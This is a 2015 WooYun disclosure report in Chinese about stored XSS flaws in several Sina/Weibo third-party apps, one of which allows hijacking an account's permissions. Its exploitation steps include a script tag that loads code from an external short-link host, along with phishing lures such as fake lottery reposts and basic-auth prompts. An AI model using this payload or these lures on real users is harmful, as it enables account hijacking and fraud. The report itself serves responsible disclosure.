漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-095883
漏洞标题:新浪应用多处 持久型xss 某处可以劫持账号权限
相关厂商:新浪
漏洞作者: izy
提交时间:2015-02-06 15:11
修复时间:2015-03-23 15:12
公开时间:2015-03-23 15:12
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经确认,细节仅向厂商公开
2015-02-19: 细节向核心白帽子及相关领域专家公开
2015-03-01: 细节向普通白帽子公开
2015-03-11: 细节向实习白帽子公开
2015-03-23: 细节向公众公开
简要描述:
第三方应用很多都出现问题。
详细说明:
以前交过一个类似的问题,但是官方只是指那修哪。
这是随便找了几个应用测试:
如下都存在问题
http://batchhelper.sinaapp.com/
http://apps.weibo.com/guanjia
http://app.weibo.com/detail/62A7lB?ref=appsearch
http://app.weibo.com/detail/411VYf?ref=appsearch
http://app.weibo.com/detail/3MnIiu?ref=appsearch
http://app.weibo.com/detail/1iA37I?ref=appsearch
这两个第三方的可被劫持权限。(删除他所有的微博等等)
http://app.weibo.com/detail/62A7lB?ref=appsearch
http://app.weibo.com/detail/411VYf?ref=appsearch
原因:在批量删除的时候加载围脖,把过滤的全部转义回来了。不只是围脖,有些简介评论也有同样的问题。
利用方法:
(1)先让目标转发一个类似<script src=http://t.cn/Rhdd4Zp></script>的微博
(2)再让目标访问有问题的应用即可触发
虽然打到的cookie没用,但还是可以钓鱼什么的。
钓鱼过,消息是这么发的.庆祝sina应用xxxx,转发微博授权应用xxxxx可以抽奖什么。。。
演示basic认证钓鱼,还可以div。。跳转什么的
漏洞证明:
修复方案:
对第三方应用过滤。
版权声明:转载请注明来源 izy@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2015-02-09 12:17
厂商回复:
感谢对新浪安全的支持,漏洞修复中。
最新状态:
暂无